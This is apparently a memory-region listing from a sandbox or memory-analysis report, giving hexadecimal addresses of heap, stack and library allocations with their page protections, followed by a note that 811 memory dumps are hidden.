||
|
1CA5691D000
|
heap
|
page read and write
|
||
|
29F26E60000
|
heap
|
page read and write
|
||
|
1CA51313000
|
heap
|
page read and write
|
||
|
20B22A5B000
|
heap
|
page read and write
|
||
|
29F26E00000
|
heap
|
page read and write
|
||
|
20B2338F000
|
heap
|
page read and write
|
||
|
1CA51B18000
|
heap
|
page read and write
|
||
|
24739FF000
|
stack
|
page read and write
|
||
|
16F95600000
|
heap
|
page read and write
|
||
|
1CA56912000
|
heap
|
page read and write
|
||
|
20B23393000
|
heap
|
page read and write
|
||
|
20B23820000
|
heap
|
page read and write
|
||
|
20B22A7C000
|
heap
|
page read and write
|
||
|
1CA51B9D000
|
heap
|
page read and write
|
||
|
EC0ABFA000
|
stack
|
page read and write
|
||
|
20B22A5E000
|
heap
|
page read and write
|
||
|
1CA5677C000
|
trusted library allocation
|
page read and write
|
||
|
16F95E02000
|
trusted library allocation
|
page read and write
|
||
|
D16B4FE000
|
stack
|
page read and write
|
||
|
1CA56933000
|
heap
|
page read and write
|
||
|
20B23802000
|
heap
|
page read and write
|
||
|
1CA51B18000
|
heap
|
page read and write
|
||
|
1C923010000
|
heap
|
page readonly
|
||
|
1CA5677F000
|
trusted library allocation
|
page read and write
|
||
|
1CA56934000
|
heap
|
page read and write
|
||
|
20B23802000
|
heap
|
page read and write
|
||
|
810ABFE000
|
stack
|
page read and write
|
||
|
20B2337C000
|
heap
|
page read and write
|
||
|
1CA5691F000
|
heap
|
page read and write
|
||
|
1FA53700000
|
heap
|
page read and write
|
||
|
20B23396000
|
heap
|
page read and write
|
||
|
1CA56BA0000
|
trusted library allocation
|
page read and write
|
||
|
810A57E000
|
stack
|
page read and write
|
||
|
22A6AA2A000
|
heap
|
page read and write
|
||
|
6A1DFF000
|
stack
|
page read and write
|
||
|
29F26E31000
|
heap
|
page read and write
|
||
|
13CF1002000
|
trusted library allocation
|
page read and write
|
||
|
1CA51B9D000
|
heap
|
page read and write
|
||
|
219B8600000
|
trusted library allocation
|
page read and write
|
||
|
1C922DA0000
|
trusted library allocation
|
page read and write
|
||
|
948B1FD000
|
stack
|
page read and write
|
||
|
1CA5690C000
|
heap
|
page read and write
|
||
|
1FA52E3D000
|
heap
|
page read and write
|
||
|
1CA5691D000
|
heap
|
page read and write
|
||
|
22A6AA71000
|
heap
|
page read and write
|
||
|
20B23395000
|
heap
|
page read and write
|
||
|
1CA51B18000
|
heap
|
page read and write
|
||
|
29F26E59000
|
heap
|
page read and write
|
||
|
20B23369000
|
heap
|
page read and write
|
||
|
38DED7B000
|
stack
|
page read and write
|
||
|
1CA566D0000
|
trusted library allocation
|
page read and write
|
||
|
22A6A840000
|
heap
|
page read and write
|
||
|
25D1BBE4000
|
heap
|
page read and write
|
||
|
1CA51BDE000
|
heap
|
page read and write
|
||
|
1CA56910000
|
heap
|
page read and write
|
||
|
677D2FB000
|
stack
|
page read and write
|
||
|
20B2338F000
|
heap
|
page read and write
|
||
|
1CA56DB0000
|
trusted library allocation
|
page read and write
|
||
|
29F26E61000
|
heap
|
page read and write
|
||
|
20B227F0000
|
heap
|
page read and write
|
||
|
1CA52370000
|
trusted library section
|
page readonly
|
||
|
1CA52250000
|
trusted library allocation
|
page read and write
|
||
|
1FA52E67000
|
heap
|
page read and write
|
||
|
1FB82B40000
|
remote allocation
|
page read and write
|
||
|
2CBFE9C0000
|
heap
|
page read and write
|
||
|
20B23363000
|
heap
|
page read and write
|
||
|
1CA51BE1000
|
heap
|
page read and write
|
||
|
2473AFD000
|
stack
|
page read and write
|
||
|
D1222FF000
|
stack
|
page read and write
|
||
|
1CA51BDE000
|
heap
|
page read and write
|
||
|
22A6AA53000
|
heap
|
page read and write
|
||
|
1C9230C0000
|
trusted library allocation
|
page read and write
|
||
|
1CA56B00000
|
trusted library allocation
|
page read and write
|
||
|
219B6870000
|
heap
|
page read and write
|
||
|
1C922DF8000
|
heap
|
page read and write
|
||
|
20B23802000
|
heap
|
page read and write
|
||
|
15E4CF30000
|
heap
|
page read and write
|
||
|
15E4D03C000
|
heap
|
page read and write
|
||
|
20B22A60000
|
heap
|
page read and write
|
||
|
20B233A7000
|
heap
|
page read and write
|
||
|
16F95666000
|
heap
|
page read and write
|
||
|
EC0AF7F000
|
unkown
|
page read and write
|
||
|
1CA51BDE000
|
heap
|
page read and write
|
||
|
20B23802000
|
heap
|
page read and write
|
||
|
1CA56940000
|
heap
|
page read and write
|
||
|
1CA5691C000
|
heap
|
page read and write
|
||
|
29F26E56000
|
heap
|
page read and write
|
||
|
1CA51A02000
|
heap
|
page read and write
|
||
|
1CA56910000
|
heap
|
page read and write
|
||
|
1CA52160000
|
trusted library allocation
|
page read and write
|
||
|
1FB82C40000
|
heap
|
page read and write
|
||
|
20B2339A000
|
heap
|
page read and write
|
||
|
29F26E6E000
|
heap
|
page read and write
|
||
|
20B2339C000
|
heap
|
page read and write
|
||
|
1CA56770000
|
trusted library allocation
|
page read and write
|
||
|
6A19FC000
|
stack
|
page read and write
|
||
|
2CBFEE40000
|
heap
|
page read and write
|
||
|
1CA57010000
|
heap
|
page read and write
|
||
|
1CA51B18000
|
heap
|
page read and write
|
||
|
219B6A00000
|
heap
|
page read and write
|
||
|
1FA52E29000
|
heap
|
page read and write
|
||
|
1CA51BDE000
|
heap
|
page read and write
|
||
|
810A9F7000
|
stack
|
page read and write
|
||
|
1CA5683C000
|
heap
|
page read and write
|
||
|
1FB82B40000
|
remote allocation
|
page read and write
|
||
|
16F95688000
|
heap
|
page read and write
|
||
|
20B233C8000
|
heap
|
page read and write
|
||
|
1FB82D02000
|
heap
|
page read and write
|
||
|
1CA51060000
|
heap
|
page read and write
|
||
|
20B23363000
|
heap
|
page read and write
|
||
|
219B6A85000
|
heap
|
page read and write
|
||
|
1CA51B59000
|
heap
|
page read and write
|
||
|
948B4FC000
|
stack
|
page read and write
|
||
|
29F26E7F000
|
heap
|
page read and write
|
||
|
1CA5691A000
|
heap
|
page read and write
|
||
|
1FA52EC6000
|
heap
|
page read and write
|
||
|
1CA56918000
|
heap
|
page read and write
|
||
|
20B22AB3000
|
heap
|
page read and write
|
||
|
13CF05A0000
|
heap
|
page read and write
|
||
|
1CA56926000
|
heap
|
page read and write
|
||
|
1CA568A9000
|
heap
|
page read and write
|
||
|
219B6A2A000
|
heap
|
page read and write
|
||
|
20B233DC000
|
heap
|
page read and write
|
||
|
1C9230B0000
|
heap
|
page read and write
|
||
|
219B6A47000
|
heap
|
page read and write
|
||
|
1CA51B9D000
|
heap
|
page read and write
|
||
|
1CA51BDE000
|
heap
|
page read and write
|
||
|
1CA5690C000
|
heap
|
page read and write
|
||
|
20B233A1000
|
heap
|
page read and write
|
||
|
EC0AEFE000
|
stack
|
page read and write
|
||
|
D12217F000
|
stack
|
page read and write
|
||
|
1DD31480000
|
heap
|
page read and write
|
||
|
38DEDFF000
|
stack
|
page read and write
|
||
|
1CA5691F000
|
heap
|
page read and write
|
||
|
20B23803000
|
heap
|
page read and write
|
||
|
2CBFCF34000
|
heap
|
page read and write
|
||
|
1CA56937000
|
heap
|
page read and write
|
||
|
16F9565C000
|
heap
|
page read and write
|
||
|
1CA56935000
|
heap
|
page read and write
|
||
|
1CA5698A000
|
heap
|
page read and write
|
||
|
120B3FC000
|
stack
|
page read and write
|
||
|
16F9565D000
|
heap
|
page read and write
|
||
|
948AFFF000
|
stack
|
page read and write
|
||
|
236E57E000
|
stack
|
page read and write
|
||
|
1CA568A4000
|
heap
|
page read and write
|
||
|
2CBFCED5000
|
heap
|
page read and write
|
||
|
236DEFB000
|
stack
|
page read and write
|
||
|
1CA5128D000
|
heap
|
page read and write
|
||
|
C9906FE000
|
stack
|
page read and write
|
||
|
20B233A7000
|
heap
|
page read and write
|
||
|
15E4D113000
|
heap
|
page read and write
|
||
|
16F95629000
|
heap
|
page read and write
|
||
|
D16B3FF000
|
stack
|
page read and write
|
||
|
1CA56906000
|
heap
|
page read and write
|
||
|
69A657E000
|
stack
|
page read and write
|
||
|
1CA51B18000
|
heap
|
page read and write
|
||
|
20B2338F000
|
heap
|
page read and write
|
||
|
2CBFED44000
|
heap
|
page read and write
|
||
|
20B23393000
|
heap
|
page read and write
|
||
|
1CA56902000
|
heap
|
page read and write
|
||
|
1CA5693B000
|
heap
|
page read and write
|
||
|
16F95662000
|
heap
|
page read and write
|
||
|
1CA56912000
|
heap
|
page read and write
|
||
|
1CA56910000
|
heap
|
page read and write
|
||
|
D12207A000
|
stack
|
page read and write
|
||
|
1CA56932000
|
heap
|
page read and write
|
||
|
69A618B000
|
stack
|
page read and write
|
||
|
20B23364000
|
heap
|
page read and write
|
||
|
20B22B08000
|
heap
|
page read and write
|
||
|
20B2337C000
|
heap
|
page read and write
|
||
|
20B23397000
|
heap
|
page read and write
|
||
|
20B22A61000
|
heap
|
page read and write
|
||
|
1CA5677B000
|
trusted library allocation
|
page read and write
|
||
|
1DD31C70000
|
trusted library allocation
|
page read and write
|
||
|
20B233B0000
|
heap
|
page read and write
|
||
|
16F95702000
|
heap
|
page read and write
|
||
|
20B22A3C000
|
heap
|
page read and write
|
||
|
25D1BBE6000
|
heap
|
page read and write
|
||
|
29F26E41000
|
heap
|
page read and write
|
||
|
29F26F02000
|
heap
|
page read and write
|
||
|
1CA5690E000
|
heap
|
page read and write
|
||
|
1CA56B08000
|
trusted library allocation
|
page read and write
|
||
|
1CA51B9D000
|
heap
|
page read and write
|
||
|
20B2334D000
|
heap
|
page read and write
|
||
|
1CA568E5000
|
heap
|
page read and write
|
||
|
1FA52EE3000
|
heap
|
page read and write
|
||
|
219B6A48000
|
heap
|
page read and write
|
||
|
20B23381000
|
heap
|
page read and write
|
||
|
1CA56910000
|
heap
|
page read and write
|
||
|
1CA56D90000
|
trusted library allocation
|
page read and write
|
||
|
1CA56910000
|
heap
|
page read and write
|
||
|
20B23382000
|
heap
|
page read and write
|
||
|
120B07E000
|
stack
|
page read and write
|
||
|
1FA52C20000
|
heap
|
page read and write
|
||
|
20B2337C000
|
heap
|
page read and write
|
||
|
E8A5C7E000
|
stack
|
page read and write
|
||
|
38DEB7D000
|
stack
|
page read and write
|
||
|
E8A607F000
|
stack
|
page read and write
|
||
|
1CA56CF0000
|
trusted library allocation
|
page read and write
|
||
|
20B233A7000
|
heap
|
page read and write
|
||
|
1CA519F3000
|
trusted library allocation
|
page read and write
|
||
|
219B6A02000
|
heap
|
page read and write
|
||
|
20B23802000
|
heap
|
page read and write
|
||
|
22A6AA48000
|
heap
|
page read and write
|
||
|
1CA56913000
|
heap
|
page read and write
|
||
|
16F95613000
|
heap
|
page read and write
|
||
|
38DEC7B000
|
stack
|
page read and write
|
||
|
13CF0530000
|
heap
|
page read and write
|
||
|
1CA51B08000
|
heap
|
page read and write
|
||
|
20B2339D000
|
heap
|
page read and write
|
||
|
1CA5681D000
|
heap
|
page read and write
|
||
|
22A6A940000
|
trusted library allocation
|
page read and write
|
||
|
25D1BB90000
|
heap
|
page read and write
|
||
|
20B23382000
|
heap
|
page read and write
|
||
|
1CA52330000
|
trusted library section
|
page readonly
|
||
|
20B22AA9000
|
heap
|
page read and write
|
||
|
810A4FE000
|
stack
|
page read and write
|
||
|
1CA51BDE000
|
heap
|
page read and write
|
||
|
25D1BBD1000
|
heap
|
page read and write
|
||
|
15E4CFD0000
|
trusted library allocation
|
page read and write
|
||
|
E8A5E7B000
|
stack
|
page read and write
|
||
|
6A187B000
|
stack
|
page read and write
|
||
|
20B23397000
|
heap
|
page read and write
|
||
|
C9909FE000
|
stack
|
page read and write
|
||
|
20B22A54000
|
heap
|
page read and write
|
||
|
1CA5123E000
|
heap
|
page read and write
|
||
|
120AEFE000
|
stack
|
page read and write
|
||
|
1CA56912000
|
heap
|
page read and write
|
||
|
16F953B0000
|
heap
|
page read and write
|
||
|
948AEFE000
|
stack
|
page read and write
|
||
|
20B22A64000
|
heap
|
page read and write
|
||
|
29F26E6A000
|
heap
|
page read and write
|
||
|
20B22A7C000
|
heap
|
page read and write
|
||
|
1CA56949000
|
heap
|
page read and write
|
||
|
1CA56B70000
|
trusted library allocation
|
page read and write
|
||
|
1CA56918000
|
heap
|
page read and write
|
||
|
13CF0613000
|
heap
|
page read and write
|
||
|
2CBFCFB0000
|
heap
|
page read and write
|
||
|
1CA5698A000
|
heap
|
page read and write
|
||
|
20B23353000
|
heap
|
page read and write
|
||
|
1CA5677B000
|
trusted library allocation
|
page read and write
|
||
|
2CBFCF40000
|
heap
|
page read and write
|
||
|
20B23396000
|
heap
|
page read and write
|
||
|
1CA56B90000
|
trusted library allocation
|
page read and write
|
||
|
1CA567F0000
|
trusted library allocation
|
page read and write
|
||
|
15E4D053000
|
heap
|
page read and write
|
||
|
16F9565A000
|
heap
|
page read and write
|
||
|
810A67B000
|
stack
|
page read and write
|
||
|
20B23367000
|
heap
|
page read and write
|
||
|
C99067B000
|
stack
|
page read and write
|
||
|
20B2339F000
|
heap
|
page read and write
|
||
|
20B2339C000
|
heap
|
page read and write
|
||
|
1FB829B0000
|
heap
|
page read and write
|
||
|
1CA51258000
|
heap
|
page read and write
|
||
|
1CA5691A000
|
heap
|
page read and write
|
||
|
1FA52E13000
|
heap
|
page read and write
|
||
|
219B6B13000
|
heap
|
page read and write
|
||
|
1CA51BDE000
|
heap
|
page read and write
|
||
|
20B23396000
|
heap
|
page read and write
|
||
|
25D1BBF0000
|
heap
|
page read and write
|
||
|
1CA56760000
|
trusted library allocation
|
page read and write
|
||
|
1CA51D00000
|
trusted library allocation
|
page read and write
|
||
|
1FA52F13000
|
heap
|
page read and write
|
||
|
25D1BBF0000
|
heap
|
page read and write
|
||
|
236E47F000
|
stack
|
page read and write
|
||
|
810A6FE000
|
stack
|
page read and write
|
||
|
20B23396000
|
heap
|
page read and write
|
||
|
2CBFCF39000
|
heap
|
page read and write
|
||
|
20B23395000
|
heap
|
page read and write
|
||
|
120AE7E000
|
stack
|
page read and write
|
||
|
29F26E57000
|
heap
|
page read and write
|
||
|
20B2331B000
|
heap
|
page read and write
|
||
|
1CA51B0E000
|
heap
|
page read and write
|
||
|
1CA56932000
|
heap
|
page read and write
|
||
|
1CA51D81000
|
trusted library allocation
|
page read and write
|
||
|
1CA56771000
|
trusted library allocation
|
page read and write
|
||
|
1CA56910000
|
heap
|
page read and write
|
||
|
1CA56B24000
|
trusted library allocation
|
page read and write
|
||
|
15E4D04C000
|
heap
|
page read and write
|
||
|
20B233A7000
|
heap
|
page read and write
|
||
|
1CA52380000
|
trusted library section
|
page readonly
|
||
|
22A6AA00000
|
heap
|
page read and write
|
||
|
20B23396000
|
heap
|
page read and write
|
||
|
120B2F9000
|
stack
|
page read and write
|
||
|
20B22A29000
|
heap
|
page read and write
|
||
|
2CBFCF37000
|
heap
|
page read and write
|
||
|
20B2339F000
|
heap
|
page read and write
|
||
|
810AAFF000
|
stack
|
page read and write
|
||
|
1CA510C0000
|
heap
|
page read and write
|
||
|
1CA56750000
|
trusted library allocation
|
page read and write
|
||
|
29F26D40000
|
heap
|
page read and write
|
||
|
6A1C7E000
|
stack
|
page read and write
|
||
|
EC0ACF7000
|
stack
|
page read and write
|
||
|
29F26E42000
|
heap
|
page read and write
|
||
|
1DD31513000
|
heap
|
page read and write
|
||
|
20B2339C000
|
heap
|
page read and write
|
||
|
1CA51200000
|
heap
|
page read and write
|
||
|
1DD313D0000
|
heap
|
page read and write
|
||
|
16F95667000
|
heap
|
page read and write
|
||
|
1FB82C29000
|
heap
|
page read and write
|
||
|
20B23399000
|
heap
|
page read and write
|
||
|
1CA5690C000
|
heap
|
page read and write
|
||
|
20B23382000
|
heap
|
page read and write
|
||
|
1C922E00000
|
heap
|
page read and write
|
||
|
1CA56BC0000
|
remote allocation
|
page read and write
|
||
|
1CA569AC000
|
heap
|
page read and write
|
||
|
20B2339A000
|
heap
|
page read and write
|
||
|
1CA5690D000
|
heap
|
page read and write
|
||
|
1CA52350000
|
trusted library section
|
page readonly
|
||
|
1CA56932000
|
heap
|
page read and write
|
||
|
20B23202000
|
heap
|
page read and write
|
||
|
13CF0713000
|
heap
|
page read and write
|
||
|
13CF0602000
|
heap
|
page read and write
|
||
|
69A64FE000
|
stack
|
page read and write
|
||
|
1CA56910000
|
heap
|
page read and write
|
||
|
20B23396000
|
heap
|
page read and write
|
||
|
22A6A7D0000
|
heap
|
page read and write
|
||
|
20B2335F000
|
heap
|
page read and write
|
||
|
20B2383E000
|
heap
|
page read and write
|
||
|
25D1BBFF000
|
heap
|
page read and write
|
||
|
120AA7A000
|
stack
|
page read and write
|
||
|
E8A5B7F000
|
stack
|
page read and write
|
||
|
1CA51B18000
|
heap
|
page read and write
|
||
|
16F95410000
|
heap
|
page read and write
|
||
|
1CA56932000
|
heap
|
page read and write
|
||
|
38DEA7C000
|
stack
|
page read and write
|
||
|
20B23396000
|
heap
|
page read and write
|
||
|
20B2339B000
|
heap
|
page read and write
|
||
|
13CF05D0000
|
trusted library allocation
|
page read and write
|
||
|
1C922DB0000
|
heap
|
page read and write
|
||
|
1CA51B59000
|
heap
|
page read and write
|
||
|
1DD31500000
|
heap
|
page read and write
|
||
|
1CA51BDE000
|
heap
|
page read and write
|
||
|
1CA56912000
|
heap
|
page read and write
|
||
|
25D1BB10000
|
heap
|
page read and write
|
||
|
1C922C80000
|
heap
|
page read and write
|
||
|
1CA51B9B000
|
heap
|
page read and write
|
||
|
236E87E000
|
stack
|
page read and write
|
||
|
20B23396000
|
heap
|
page read and write
|
||
|
29F26E5C000
|
heap
|
page read and write
|
||
|
E8A55BB000
|
stack
|
page read and write
|
||
|
1CA5690C000
|
heap
|
page read and write
|
||
|
20B22AF5000
|
heap
|
page read and write
|
||
|
13CF0676000
|
heap
|
page read and write
|
||
|
15E4D081000
|
heap
|
page read and write
|
||
|
2CBFCF90000
|
heap
|
page read and write
|
||
|
1C922D90000
|
trusted library allocation
|
page read and write
|
||
|
20B22A13000
|
heap
|
page read and write
|
||
|
1DD31428000
|
heap
|
page read and write
|
||
|
1CA52340000
|
trusted library section
|
page readonly
|
||
|
15E4D013000
|
heap
|
page read and write
|
||
|
1CA5690C000
|
heap
|
page read and write
|
||
|
20B2339A000
|
heap
|
page read and write
|
||
|
1CA51B18000
|
heap
|
page read and write
|
||
|
20B2339F000
|
heap
|
page read and write
|
||
|
20B23394000
|
heap
|
page read and write
|
||
|
15E4CF40000
|
heap
|
page read and write
|
||
|
24737FE000
|
stack
|
page read and write
|
||
|
120B1FA000
|
stack
|
page read and write
|
||
|
219B69D0000
|
trusted library allocation
|
page read and write
|
||
|
20B23393000
|
heap
|
page read and write
|
||
|
810A47B000
|
stack
|
page read and write
|
||
|
1DD31464000
|
heap
|
page read and write
|
||
|
1CA56900000
|
heap
|
page read and write
|
||
|
1CA51302000
|
heap
|
page read and write
|
||
|
247367B000
|
stack
|
page read and write
|
||
|
2CBFD0E0000
|
heap
|
page read and write
|
||
|
2CBFCF2B000
|
heap
|
page read and write
|
||
|
15E4CFA0000
|
heap
|
page read and write
|
||
|
1CA56910000
|
heap
|
page read and write
|
||
|
1CA56CE0000
|
trusted library allocation
|
page read and write
|
||
|
20B2339F000
|
heap
|
page read and write
|
||
|
20B22AA9000
|
heap
|
page read and write
|
||
|
20B22AEA000
|
heap
|
page read and write
|
||
|
1CA5129D000
|
heap
|
page read and write
|
||
|
20B2339C000
|
heap
|
page read and write
|
||
|
1CA51BDE000
|
heap
|
page read and write
|
||
|
2CBFF220000
|
trusted library allocation
|
page read and write
|
||
|
2CBFCE99000
|
heap
|
page read and write
|
||
|
1CA56910000
|
heap
|
page read and write
|
||
|
20B2339D000
|
heap
|
page read and write
|
||
|
2CBFCF69000
|
heap
|
page read and write
|
||
|
236E17D000
|
stack
|
page read and write
|
||
|
15E4D102000
|
heap
|
page read and write
|
||
|
E8A5F7D000
|
stack
|
page read and write
|
||
|
15E4DA02000
|
trusted library allocation
|
page read and write
|
||
|
20B233B8000
|
heap
|
page read and write
|
||
|
25D1BBFF000
|
heap
|
page read and write
|
||
|
20B2339B000
|
heap
|
page read and write
|
There are 811 hidden memdumps, click here to show them.